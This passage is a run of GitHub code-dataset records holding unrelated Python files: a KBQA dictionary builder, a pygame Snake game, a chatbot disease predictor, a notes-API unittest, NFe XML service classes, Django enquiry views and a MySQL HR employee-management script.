_exe_raw_sql(sql)]\n","repo_name":"stasya72008/a-ron-don-don","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38906729454","text":"\"\"\"\n    Map questions, answers, entities, relations, etc. to word-level dictionaries, i.e. down to the atomic level.\n    Each kind of item (word-level and entity/relation-level) has a corresponding index id.\n    For example, \"Joseph Tom\" as a single entity gets one index id, while the individual words \"Joseph\" and \"Tom\" each get an index of their own.\n\"\"\"\nfrom collections import defaultdict\nimport random\nimport csv\nfrom word_process_method import *\nfrom tqdm import tqdm\nwords = set([]) # word level\nentities = set([])\nrelations = set([])\nall = set([])\ntop_k = 0 # track the maximum number of answers\ndef add_entity(entity):\n    entities.add(entity)\n    for w in entity.split(\" \"):\n        words.add(clean_word(w))\ndef add_sentence(sentence):\n    for w in sentence.split(\" \"):\n        words.add(clean_word(w))\ndef read_kb_file( kb_path):\n    with open(kb_path,'r',encoding='utf-8') as kb_file:\n        print(\"reading kb_file...\")\n        reader = csv.DictReader(kb_file,delimiter=\"|\",fieldnames=['subject','relation','object'])\n        for row in tqdm(reader):\n            e1,r,e2 = row['subject'],row['relation'],row['object']\n            add_entity(e1)\n            add_entity(e2)\n            relations.add(r)\n            relations.add(\"!_\"+r) # also add the inverse relation of each triple\ndef read_doc_file(doc_path):\n    with 
open(doc_path,'r',encoding='utf-8') as doc_file:\n        print(\"reading doc file...\")\n        reader = csv.DictReader(doc_file,delimiter=\"|\",fieldnames=['e','r','desc'])\n        for row in tqdm(reader):\n            ent,rel,desc = row['e'],row['r'],row['desc']\n            add_entity(ent)\n            relations.add(rel)\n            relations.add(\"!_\"+rel)\n            add_sentence(desc)\ndef read_qa_file(qa_path):\n    global top_k\n    with open(qa_path,'r',encoding='utf-8') as qa_file:\n        print(\"reading qa file ...\")\n        reader = csv.DictReader(qa_file,delimiter='\\t',fieldnames=['q','a'])\n        for row in tqdm(reader):\n            q,a = row['q'],row['a']\n            add_sentence(q)\n            aa=a.split(\"|\")\n            top_k = max(top_k,len(aa))\n            for e in aa:\n                add_entity(e)\ndef write_idx(idx_path,s,write_num=None):\n    print(\"writing \",idx_path,\" ...\")\n    # append the question-number tokens\n    if write_num:\n        for i in range(0,top_k):\n            qa_num = \"@{no}\".format(no=i)\n            s.add(qa_num)\n    ordered_set = sorted(s) # sort\n    id=1\n    with open(idx_path,'w',newline='',encoding='utf-8') as idx_file:\n        writer = csv.DictWriter(idx_file,delimiter='\\t',fieldnames=['x','count'])\n        for x in ordered_set :\n            writer.writerow({'x':x,'count':id})\n            id = id+1\nif __name__ == \"__main__\":\n    dataset = \"wiki\"\n    path = \"../data/movieqa/\"\n    tran_path = path+\"clean_{name}_qa_train.txt\".format(name=dataset)\n    test_path = path+\"clean_{name}_qa_test.txt\".format(name=dataset)\n    dev_path = path+\"clean_{name}_qa_dev.txt\".format(name=dataset)\n    kb_path = path+\"clean_wiki_kb.txt\" #.format(name=dataset)\n    doc_path = path+\"clean_wiki_doc.txt\"\n    read_doc_file(doc_path)\n    read_kb_file(kb_path)\n    read_qa_file(tran_path)\n    read_qa_file(test_path)\n    read_qa_file(dev_path)\n    write_idx(path + \"{name}_word_idx.txt\".format(name=dataset),words)\n    write_idx(path + \"{name}_entity_idx.txt\".format(name=dataset), entities)\n    write_idx(path + \"{name}_relation_idx.txt\".format(name=dataset), relations)\n    all = all.union(words,entities,relations)\n    write_idx(path + \"{name}_idx.txt\".format(name=dataset), all,write_num=True)","repo_name":"Joseph1314/MyKBQA","sub_path":"Code_KV/get_dictionary.py","file_name":"get_dictionary.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"33560696167","text":"import random, pygame, sys\r\nfrom pygame.locals import *\r\n\r\nFPS = 15\r\nWINDOWIDTH = 640\r\nWINDOWHEIGHT = 480\r\nCELLSIZE = 20\r\nassert WINDOWIDTH % CELLSIZE == 0, \"Window width must be a multiple of cell size\"\r\nassert WINDOWHEIGHT % CELLSIZE == 0, \"Window height must be a multiple of cell size\"\r\nCELLWIDTH = int(WINDOWIDTH / CELLSIZE)\r\nCELLHEIGHT = int(WINDOWHEIGHT / CELLSIZE)\r\n\r\n#RGB\r\n\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nDARKG = (0, 155, 0)\r\nDARKGRAY = (40, 40, 40)\r\nBGCOLOR = BLACK\r\n\r\nUP = 'up'\r\nDOWN = 'down'\r\nLEFT = 'left'\r\nRIGHT = 'right'\r\n\r\nHEAD = 0 #head of the snake\r\n\r\ndef rtrn_func():\r\n    return\r\n\r\ndef main():\r\n\r\n    global FPSCLOCK, DISPLAYSURF, BASICFONT\r\n\r\n    pygame.init()\r\n    \r\n    FPSCLOCK = pygame.time.Clock()\r\n    DISPLAYSURF = pygame.display.set_mode((WINDOWIDTH, WINDOWHEIGHT))\r\n    BASICFONT = pygame.font.Font('freesansbold.ttf', 18)\r\n    pygame.display.set_caption('Snake do Paraguai')\r\n\r\n    showStartScreen()\r\n\r\n    \r\n    #while True:\r\n\r\n    runGame()\r\n    showGameOverScreen()\r\n\r\ndef runGame():\r\n\r\n    #set random start point\r\n    startx = random.randint(5, CELLWIDTH - 6)\r\n    starty = random.randint(5, CELLHEIGHT - 6)\r\n    snakeCoords = [{'x': startx, 'y': 
starty},\r\n                   {'x': startx -1, 'y': starty},\r\n                   {'x': startx -2, 'y': starty}]\r\n    direction = RIGHT\r\n\r\n    #Start apple in a random location\r\n    apple = getRandomLocation()\r\n\r\n    while True: #main game Loop\r\n        for event in pygame.event.get():\r\n            print(event)\r\n            if event.type == QUIT:\r\n                terminate()\r\n            elif event.type == KEYDOWN:\r\n                if(event.key == K_LEFT or event.key == K_a) and direction != RIGHT:\r\n                    direction = LEFT\r\n                elif(event.key == K_RIGHT or event.key == K_d) and direction != LEFT:\r\n                    direction = RIGHT\r\n                elif(event.key == K_UP or event.key == K_w) and direction != DOWN:\r\n                    direction = UP\r\n                elif(event.key == K_DOWN or event.key == K_s) and direction != UP:\r\n                    direction = DOWN\r\n                elif event.key == K_ESCAPE:\r\n                    terminate()\r\n        print(\"Head: \", snakeCoords[HEAD]['x'], snakeCoords[HEAD]['y'])\r\n\r\n\r\n        #check if the snake has hit itself or the edge\r\n        if snakeCoords[HEAD]['x'] == 0 or snakeCoords[HEAD]['x'] == CELLWIDTH or snakeCoords[HEAD]['y'] == 0 or snakeCoords[HEAD]['y'] == CELLHEIGHT:\r\n            print(\"GAME OVER - HIT THE EDGE\")\r\n            return\r\n\r\n        #rtrn_func() #game over\r\n        for snakeBody in snakeCoords[1:]:\r\n            if snakeBody['x'] == snakeCoords[HEAD]['x'] and snakeBody['y'] == snakeCoords[HEAD]['y']:\r\n                print(\"GAME OVER - SNAKE ATE ITSELF\")\r\n                return\r\n            #rtrn_func() #game over\r\n\r\n        # check if snake has eaten an apple\r\n        if snakeCoords[HEAD]['x'] == apple['x'] and snakeCoords[HEAD]['y'] == apple['y']:\r\n            apple = getRandomLocation()\r\n        else:\r\n            del snakeCoords[-1]\r\n\r\n        #Move the fucking snake\r\n        if direction == UP:\r\n            newhead = {'x': snakeCoords[HEAD]['x'], 'y': snakeCoords[HEAD]['y'] -1}\r\n        elif direction == DOWN:\r\n            newhead = {'x': snakeCoords[HEAD]['x'], 'y': snakeCoords[HEAD]['y'] +1}\r\n        elif direction == LEFT:\r\n            newhead = {'x': snakeCoords[HEAD]['x'] -1, 'y': snakeCoords[HEAD]['y']}\r\n        elif direction == RIGHT:\r\n            newhead = {'x': snakeCoords[HEAD]['x'] +1, 'y': snakeCoords[HEAD]['y']}\r\n        snakeCoords.insert(0, newhead)\r\n\r\n        DISPLAYSURF.fill(BGCOLOR)\r\n        drawGrid()\r\n        drawSnake(snakeCoords)\r\n        drawApple(apple)\r\n        drawScore(len(snakeCoords)-3)\r\n        pygame.display.update()\r\n        FPSCLOCK.tick(FPS)\r\n\r\n\r\n\r\ndef drawPressKeyMsg():\r\n    pressKeySurf = BASICFONT.render('Press a key to play.', True, DARKGRAY)\r\n    pressKeyRect = pressKeySurf.get_rect()\r\n    pressKeyRect.topleft = (WINDOWIDTH - 200, WINDOWHEIGHT - 30)\r\n    DISPLAYSURF.blit(pressKeySurf, pressKeyRect)\r\n    \r\ndef checkForKeyPress():\r\n    if len(pygame.event.get(QUIT)) > 0:\r\n        terminate()\r\n\r\n    KeyUpEvents = pygame.event.get(KEYUP)\r\n\r\n    if len(KeyUpEvents) == 0:\r\n        return None\r\n\r\n    if KeyUpEvents[0].key == K_ESCAPE:\r\n        terminate()\r\n    return KeyUpEvents[0].key\r\n\r\ndef showStartScreen():\r\n    titleFont = pygame.font.Font('freesansbold.ttf', 50)\r\n    titleSurf1 = titleFont.render('Snake do Paraguai', True, WHITE, DARKG)\r\n    titleSurf2 = titleFont.render('Snake do Paraguai', True, GREEN)\r\n\r\n    degrees1 = 0\r\n    degrees2 = 0\r\n    while True:\r\n        DISPLAYSURF.fill(BGCOLOR)\r\n\r\n        rotatedSurf1 = pygame.transform.rotate(titleSurf1, degrees1)\r\n        rotatedRect1 = rotatedSurf1.get_rect()\r\n        rotatedRect1.center = (WINDOWIDTH / 2, WINDOWHEIGHT / 2)\r\n        DISPLAYSURF.blit(rotatedSurf1, rotatedRect1)\r\n\r\n        rotatedSurf2 = pygame.transform.rotate(titleSurf2, degrees2)\r\n        rotatedRect2 = rotatedSurf2.get_rect()\r\n        rotatedRect2.center = (WINDOWIDTH / 2, WINDOWHEIGHT / 2)\r\n        DISPLAYSURF.blit(rotatedSurf2, rotatedRect2)\r\n\r\n        drawPressKeyMsg()\r\n\r\n        if checkForKeyPress():\r\n            
pygame.event.get()\r\n return\r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n\r\ndef getRandomLocation():\r\n return{'x': random.randint(0, CELLWIDTH - 1), 'y': random.randint(0, CELLHEIGHT -1)}\r\n\r\ndef showGameOverScreen():\r\n gameOverFont = pygame.font.Font('freesansbold.ttf', 150)\r\n gameSurf = gameOverFont.render('Game', True, WHITE)\r\n overSurf = gameOverFont.render('Over', True, WHITE)\r\n gameRect = gameSurf.get_rect()\r\n overRect = overSurf.get_rect()\r\n gameRect.midtop = (WINDOWIDTH /2, 10)\r\n overRect.midtop = (WINDOWIDTH / 2,gameRect.height + 10 + 25)\r\n\r\n DISPLAYSURF.blit(gameSurf, gameRect)\r\n DISPLAYSURF.blit(overSurf, overRect)\r\n drawPressKeyMsg()\r\n pygame.display.update()\r\n\r\n pygame.time.wait(500)\r\n checkForKeyPress()\r\n\r\n while True:\r\n if checkForKeyPress():\r\n pygame.event.get()\r\n return\r\n\r\ndef drawScore(score):\r\n scoreSurf = BASICFONT.render('Score: %s' % (score), True, WHITE)\r\n scoreRect = scoreSurf.get_rect()\r\n scoreRect.topleft = (WINDOWIDTH - 120, 10)\r\n DISPLAYSURF.blit(scoreSurf, scoreRect)\r\n\r\ndef drawSnake(snakeCoords):\r\n for coord in snakeCoords:\r\n x = coord['x'] * CELLSIZE\r\n y = coord['y'] * CELLSIZE\r\n snakeSegmentRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)\r\n pygame.draw.rect(DISPLAYSURF, DARKG, snakeSegmentRect)\r\n wormInnerSegmentRect = pygame.Rect(x + 4, y + 4, CELLSIZE - 8, CELLSIZE - 8)\r\n pygame.draw.rect(DISPLAYSURF, GREEN, wormInnerSegmentRect)\r\n\r\ndef drawApple(coord):\r\n x = coord['x'] * CELLSIZE\r\n y = coord['y'] * CELLSIZE\r\n appleRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)\r\n pygame.draw.rect(DISPLAYSURF, RED, appleRect)\r\n\r\ndef drawGrid():\r\n for x in range(0, WINDOWIDTH, CELLSIZE):\r\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (x, 0), (x, WINDOWHEIGHT))\r\n for y in range(0, WINDOWHEIGHT, CELLSIZE):\r\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (0, y), (WINDOWIDTH, y))\r\n \r\nif __name__ == '__main__':\r\n main()","repo_name":"pyString/Fake-Snake","sub_path":"Teste2PyGame.py","file_name":"Teste2PyGame.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25772115818","text":"import pickle\n\nimport numpy as np\n\nfrom FinalDataset.DayFive.StepSix import StringToInt\n\n\ndef predict(symptoms_list):\n mkm = pickle.load(open('./FinalDataset/MiniBatchKMeansModel.pkl',\n 'rb'))\n symptoms_model = pickle.load(open('./FinalDataset/Symptoms.pkl',\n 'rb'))\n data = pickle.load(open('./FinalDataset/TrainingPreProcessedData.pkl', 'rb'))\n\n dis = pickle.load(open('./FinalDataset/ValueDiseaseDictionary.pkl', 'rb'))\n\n mkmdict = pickle.load(open('./FinalDataset/MiniBatchDictionary.pkl',\n 'rb'))\n\n conv = []\n for symptom in symptoms_model:\n if symptom in symptoms_list:\n conv.append(1)\n else:\n conv.append(0)\n conv = np.array(conv)\n data_x = conv.tolist()[:int(1909 / 2)]\n data_y = conv.tolist()[int(1909 / 2):1909]\n\n b = StringToInt.Binary()\n x_value = int(b._ToNumber(\"\".join(str(x) for x in data_x)))\n y_value = int(b._ToNumber(\"\".join(str(y) for y in data_y)))\n\n st = '(' + str(x_value) + ', ' + str(y_value) + ')'\n\n temp = {}\n if st in dis.keys():\n print(dis[st])\n else:\n vals = mkmdict[int(str(mkm.predict([[x_value, y_value]])).replace('[', '').replace(']', ''))]\n for val in vals:\n # euclidean_distance.append(((val[0] - x_value) ** 2 + (val[1] - y_value) ** 2)**0.5)\n temp[((val[0] - x_value) ** 2 + 
(val[1] - y_value) ** 2) ** 0.5] = [val[0], val[1]]\n\n predicted_diseases = []\n\n for i in range(5):\n value = temp[sorted(list(temp.keys()))[i]]\n # print(dis['('+str(value[0])+', '+str(value[1])+')'])\n # print(dis[(542, 636)])\n predicted_diseases.extend(dis[tuple(value)])\n\n return predicted_diseases\n","repo_name":"SharobSinha97/MedicalChatbot","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71138615753","text":"import unittest\nfrom copy import deepcopy\nfrom common.read_yml import ReadYaml\nimport time\nfrom common.logs_create import info_log, log_class_methods\nfrom business_common.request_demo import RequestsDemo\nfrom common.resCheck import ResCheck\nfrom parameterized import parameterized\nfrom business_common.clean_Usernote import ClearNotes\n\n\n@log_class_methods\nclass NotesvrSetnoteInfolevel2(unittest.TestCase):\n env_config = ReadYaml.env_yaml(\"config.yml\")\n host = env_config[\"host\"]\n sid = env_config[\"sid\"]\n userid = env_config[\"userid\"]\n path = \"/v3/notesvr/set/noteinfo\"\n url = host + path\n api_data_base = {\"noteId\": str(int(time.time() * 1000)),\n \"star\": 1,\n \"remindTime\": int(time.time()),\n \"remindType\": \"1\",\n \"groupId\": \"groupId\"}\n star_num = ([{\"star\": 1, \"code\": 200}], [{\"star\": 0, \"code\": 200}])\n\n remindType_num = ([{\"remindType\": 0, \"code\": 200}],\n [{\"remindType\": 1, \"code\": 200}],\n [{\"remindType\": 2, \"code\": 200}])\n\n def setUp(self) -> None:\n \"\"\"清空该用户所有便签\"\"\"\n info_log(\"清空该用户所有便签\")\n res = ClearNotes().clean_Usernote(self.userid, self.sid)\n self.assertEqual(True, res, msg=\"clear notes error!\")\n\n @parameterized.expand(star_num)\n def testCase02(self, star_num):\n \"\"\"上传/更新便签信息star枚举值校验\"\"\"\n info_log(\"用户上传/更新便签信息star枚举值\")\n data = deepcopy(self.api_data_base)\n data[\"star\"] = star_num[\"star\"]\n res = RequestsDemo().post(url=self.url, userid=self.userid, sid=self.sid, data=self.api_data_base)\n expect_res = {\"responseTime\": int, \"infoVersion\": int, \"infoUpdateTime\": int}\n self.assertEqual(200, res.status_code)\n ResCheck().res_check(expect_res, res.json())\n\n @parameterized.expand(remindType_num)\n def testCase03(self, remindType_num):\n \"\"\"上传/更新便签信息remindType枚举值校验\"\"\"\n info_log(\"用户上传/更新便签信息remindType枚举值\")\n data = deepcopy(self.api_data_base)\n data[\"remindType\"] = remindType_num\n res = RequestsDemo().post(url=self.url, userid=self.userid, sid=self.sid, data=self.api_data_base)\n expect_res = {\"responseTime\": int, \"infoVersion\": int, \"infoUpdateTime\": int}\n self.assertEqual(200, res.status_code)\n ResCheck().res_check(expect_res, res.json())\n","repo_name":"zhaosudi/Note","sub_path":"TestCase/note/NotesvrSetnoteInfo/test_level2.py","file_name":"test_level2.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14975795519","text":"#Consider an equation of form, Ax + B = Cx + D\ndef elemR(input_array, x):\n i=0 #loop counter\n length = len(input_array)\n while(i'\n return xml\n\n def set_xml(self, arquivo):\n if self._le_xml(arquivo):\n self.versao.xml = arquivo\n self.tpAmb.xml = arquivo\n self.cUF.xml = arquivo\n self.xServ.xml = arquivo\n\n xml = property(get_xml, set_xml)\n \n\nclass RetConsStatServ(XMLNFe):\n def __init__(self):\n super(RetConsStatServ, self).__init__()\n self.versao = 
TagDecimal(nome=u'retConsStatServ', codigo=u'FR01', propriedade=u'versao', namespace=NAMESPACE_NFE, valor=u'1.07', raiz=u'/')\n self.tpAmb = TagInteiro(nome=u'tpAmb' , codigo=u'FR03', tamanho=[1, 1, 1], raiz=u'//retConsStatServ', valor=2)\n self.verAplic = TagCaracter(nome=u'verAplic' , codigo=u'FR04', tamanho=[1, 20] , raiz=u'//retConsStatServ')\n self.cStat = TagCaracter(nome=u'cStat' , codigo=u'FR05', tamanho=[3, 3, 3], raiz=u'//retConsStatServ')\n self.xMotivo = TagCaracter(nome=u'xMotivo' , codigo=u'FR06', tamanho=[1, 255] , raiz=u'//retConsStatServ')\n self.cUF = TagInteiro(nome=u'cUF' , codigo=u'FR07', tamanho=[2, 2, 2], raiz=u'//retConsStatServ')\n self.dhRecbto = TagDataHora(nome=u'dhRecbto' , codigo=u'FR08', raiz=u'//retConsStatServ')\n self.tMed = TagInteiro(nome=u'tMed' , codigo=u'FR09', tamanho=[1, 4] , raiz=u'//retConsStatServ', obrigatorio=False)\n self.dhRetorno = TagDataHora(nome=u'dhRetorno' , codigo=u'FR10', raiz=u'//retConsStatServ', obrigatorio=False)\n self.xObs = TagCaracter(nome=u'xObs' , codigo=u'FR11', tamanho=[1, 255] , raiz=u'//retConsStatServ', obrigatorio=False)\n self.caminho_esquema = os.path.join(DIRNAME, u'schema', ESQUEMA_ATUAL + u'/')\n self.arquivo_esquema = u'retConsStatServ_v1.07.xsd'\n\n def get_xml(self):\n xml = XMLNFe.get_xml(self)\n xml += ABERTURA\n xml += self.versao.xml\n xml += self.tpAmb.xml\n xml += self.verAplic.xml\n xml += self.cStat.xml\n xml += self.xMotivo.xml\n xml += self.cUF.xml\n xml += self.dhRecbto.xml\n xml += self.tMed.xml\n xml += self.dhRetorno.xml\n xml += self.xObs.xml\n xml += u''\n return xml\n\n def set_xml(self, arquivo):\n if self._le_xml(arquivo):\n self.versao.xml = arquivo\n self.tpAmb.xml = arquivo\n self.verAplic.xml = arquivo\n self.cStat.xml = arquivo\n self.xMotivo.xml = arquivo\n self.cUF.xml = arquivo\n self.dhRecbto.xml = arquivo\n self.tMed.xml = arquivo\n self.dhRetorno.xml = arquivo\n self.xObs.xml = arquivo\n\n xml = property(get_xml, set_xml)\n","repo_name":"marcydoty/Recursos-NFE-em-Python","sub_path":"nfe/pysped/nfe/manual_300/consstatserv_107.py","file_name":"consstatserv_107.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"pt","doc_type":"code","stars":68,"dataset":"github-code","pt":"27"} +{"seq_id":"173064456","text":"from django.shortcuts import (\n\n render,\n get_object_or_404,\n redirect)\nfrom django.urls import reverse\nfrom .models import Enquiry\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import EnquiryForm\n\n\ndef all_enquiries(request):\n \"\"\" A view to return all enquiries \"\"\"\n if request.user.is_superuser:\n enquiries = Enquiry.objects.all().filter\n else:\n enquiries = Enquiry.objects.all().filter(status=1)\n\n context = {\n 'enquiries': enquiries,\n 'on_page': True,\n }\n\n return render(request, 'enquiry/enquiries.html', context)\n\n\n@login_required\ndef add_enquiry(request):\n \"\"\" Add a new enquiry \"\"\"\n if not request.user.is_superuser:\n messages.error(\n request,\n 'Sorry, only store owner can add new enquiries.'\n )\n return redirect(reverse('home'))\n\n enquiries = Enquiry.objects.all()\n\n if request.method == 'POST':\n form = EnquiryForm(request.POST)\n\n if form.is_valid():\n form.save()\n messages.success(request, \"Enquiry was added successfully.\")\n return redirect(reverse('enquiries'))\n else:\n messages.error(request,\n 'Enquiry was not added. 
Correct the form inputs.'\n )\n else:\n form = EnquiryForm()\n\n template = 'enquiry/add_enquiry.html'\n context = {\n 'form': form,\n 'enquiries': enquiries,\n 'on_page': True,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_enquiry(request, enquiry_id):\n \"\"\" Edit an enquiry \"\"\"\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owner can edit enquiries.')\n return redirect(reverse('home'))\n\n enquiry = get_object_or_404(Enquiry, pk=enquiry_id)\n\n if request.method == 'POST':\n form = EnquiryForm(request.POST, instance=enquiry)\n\n if form.is_valid():\n form.save()\n messages.success(request, \"Enquiry was edited successfully.\")\n return redirect(reverse('enquiries'))\n else:\n messages.error(request,\n 'Enquiry was not edited. Correct the form inputs.'\n )\n else:\n form = EnquiryForm(instance=enquiry)\n\n template = 'enquiry/edit_enquiry.html'\n context = {\n 'form': form,\n 'enquiry': enquiry,\n 'on_page': True,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_enquiry(request, enquiry_id):\n \"\"\" Delete an enquiry \"\"\"\n if not request.user.is_superuser:\n messages.error(\n request,\n 'Sorry, only the admin can delete enquiries.')\n return redirect(reverse('enquiries'))\n\n enquiry = get_object_or_404(Enquiry, pk=enquiry_id)\n enquiry.delete()\n messages.success(request,\n 'Enquiry was deleted successfully.')\n\n context = {\n 'on_page': True,\n }\n\n return redirect(reverse('enquiries'), context)\n","repo_name":"lucia2007/bookwormkid","sub_path":"enquiry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22546442845","text":"# Import MySql Connector\r\nimport mysql.connector\r\n\r\n# TO CONNECTOR OBJECT\r\nmycon = mysql.connector.connect(\r\nhost='localhost', user='root',\r\npassword='', database='HR')\r\n# TO CURSOR OBJECT MAS\r\ncurs = mycon.cursor()\r\n\r\n\r\n# FUNCTION GIA ELEGXO ID AN YPARXEI STH VASH\r\ndef check():\r\n # SELECT QUERY GIA ELEGXO ID\r\n qry = 'select id_emp from personel;'\r\n curs.execute(qry)\r\n\r\n d = curs.fetchall()\r\n idlist = []\r\n for ids in d:\r\n idlist.append(ids[0])\r\n return idlist\r\n\r\n# FUNCTION GIA PROS8HKH YPALLHLOY STHN VASH MAS\r\ndef register():\r\n loop = 'Y'\r\n idlist = check()\r\n while loop in 'yY':\r\n id_emp = int(input('Enter employee ID: '))\r\n # ELEGXOS AN YPARXEI TO ID HDH STHN VASH MAS\r\n if id_emp in idlist:\r\n print(\"This Employee Id already exists. Try another!\\n\")\r\n\r\n else:\r\n # DHMIOYRGOYME TUPPLE ME TA STOIXEIA POY 8ELOYME NA DWSOYME STON YPALLHLO\r\n data = ()\r\n name = input('Name : ')\r\n email = input('Email : ')\r\n phone = input('Phone Number : ')\r\n address = input('Address : ')\r\n salary = input('Salary : ')\r\n data = (id_emp, name, email, phone, address, salary)\r\n\r\n qry = 'insert into personel values(%s,%s,%s,%s,%s,%s);'\r\n\r\n val = data\r\n\r\n curs.execute(qry, val)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY REGISTERED!!\\n')\r\n loop = input('Do you want to register another employee? 
(Y/N) ')\r\n if loop not in ('Yy'):\r\n break\r\n\r\n\r\n\r\n# FUNCTION GIA PROVOLH STOIXEIWN ENOS YPALLHLOY\r\ndef view():\r\n id_emp = int(input('Enter the ID of the employee you wish to view: '))\r\n\r\n #TUPPLE POY 8A VALOYME PIO KATW STO QUERY ME TO ID POY 8A DWSEI O XRHSTHS\r\n idtp = (id_emp,)\r\n\r\n #ELEGXOS AN YPARXEI TO ID POY DINEI O XRHSTHS\r\n idlist = check()\r\n if id_emp in idlist:\r\n # TO QUERY POY XREIAZOMASTE GIA NA MAS EMFANISEI OLA TA STOIXEIA TOY YPALLHLOY\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected is: \\n')\r\n for x in empl:\r\n print(x)\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n\r\n\r\n\r\n#FUNCTION POY EPEKSERGAZETAI DEDOMENA XRHSTWN\r\ndef edit():\r\n id_emp = int(input('Enter employee ID: '))\r\n\r\n # TUPPLE POY 8A VALOYME PIO KATW STO QUERY ME TO ID POY 8A DWSEI O XRHSTHS\r\n idtp = (id_emp,)\r\n\r\n # ELEGXOS AN YPARXEI TO ID POY DINEI O XRHSTHS\r\n idlist = check()\r\n\r\n if id_emp in idlist:\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected is: \\n')\r\n for x in empl:\r\n print(x)\r\n\r\n con = input('Are you sure you want to edit this data? (Y/N) ')\r\n if con in ('y', 'Y'):\r\n\r\n #TUPPLE data TO GEMIZOYME ME DEDOMENA POY DINEI O XRHSTHS\r\n data = ()\r\n name = input('Name : ')\r\n email = input('Email : ')\r\n phone = input('Phone Number : ')\r\n address = input('Address : ')\r\n salary = input('Salary : ')\r\n data = (name, email, phone, address, salary, id_emp)\r\n\r\n # UPDATE QUERY GIA NA GINEI TO EDIT STHN VASH\r\n qry = \"update personel \" \\\r\n \"set name=%s, email=%s, phone=%s, address=%s, salary=%s \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY EDITED!!\\n')\r\n else:\r\n print('EDIT CANCELED!!\\n')\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n\r\n# FUNCTION PROAGWGHS\r\ndef promote():\r\n id_emp = int(input('Enter employee ID: '))\r\n\r\n # TUPPLE POY 8A VALOYME PIO KATW STO QUERY ME TO ID POY 8A DWSEI O XRHSTHS\r\n idtp = (id_emp,)\r\n idlist = check()\r\n if id_emp in idlist:\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected for promotion is: \\n')\r\n for x in empl:\r\n print(x)\r\n\r\n con = input('Are you sure you want to promote this employee (Y/N) ')\r\n if con in ('y', 'Y'):\r\n data = ()\r\n salary = input('Salary : ')\r\n data = (salary, id_emp)\r\n\r\n #UPDATE QUERY GIA EDIT MIS8OY\r\n qry = \"update personel \" \\\r\n \"set salary=%s \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY PROMOTED!!\\n')\r\n else:\r\n print('PROMOTION CANCELED!!\\n')\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n# FUNCTION GIA DIAGRAFH YPALLHLOY APO THN VASH\r\ndef delete():\r\n id_emp = int(input('Enter employee ID: '))\r\n\r\n # TUPPLE POY 8A VALOYME PIO KATW STO QUERY ME TO ID POY 8A DWSEI O XRHSTHS\r\n idtp = (id_emp,)\r\n idlist = check()\r\n if id_emp in idlist:\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected is: \\n')\r\n for x in empl:\r\n print(x)\r\n\r\n con = 
input('Are you sure you want to DELETE this employee (Y/N) ')\r\n if con in ('y', 'Y'):\r\n data = (id_emp,)\r\n\r\n\r\n #TO DELETE QUERY POY 8A DIAGRAPSEI TON XRHSTH\r\n qry = \"delete from personel \" \\\r\n \"where id_emp = %s;\"\r\n\r\n curs.execute(qry, data)\r\n mycon.commit()\r\n print('EMPLOYEE SUCCESSFULLY DELETED!!\\n')\r\n else:\r\n print('DELETE CANCELED!!\\n')\r\n else:\r\n print('The ID you provided does not match any of our employees!\\n')\r\n\r\n\r\n#FUNCTION GIA ANAZHTHSH SYGKEKRIMENOY XRHSTH\r\ndef search():\r\n id_emp = int(input('Enter employee ID: '))\r\n idtp = (id_emp,)\r\n idlist = check()\r\n if id_emp in idlist:\r\n qry = 'select * from personel where id_emp = %s;'\r\n curs.execute(qry, idtp)\r\n empl = curs.fetchall()\r\n print('The employee you have selected is: \\n')\r\n for x in empl:\r\n print(x)\r\n\r\n #EDW ANOIGOYME ENA MENU PAROMOIO ME THN ARXIKH MAS SELIDA GIA NA EPEKSERGASTOYME TON EPILEGMENO YPALLHLO\r\n #OI EPILOGES KANOYN SXEDON TIS IDIES DIADIKASIES ME TA FUNCTIONS APO PANW.\r\n print('What would you like to do with this employee?\\n'\r\n 'a. Edit 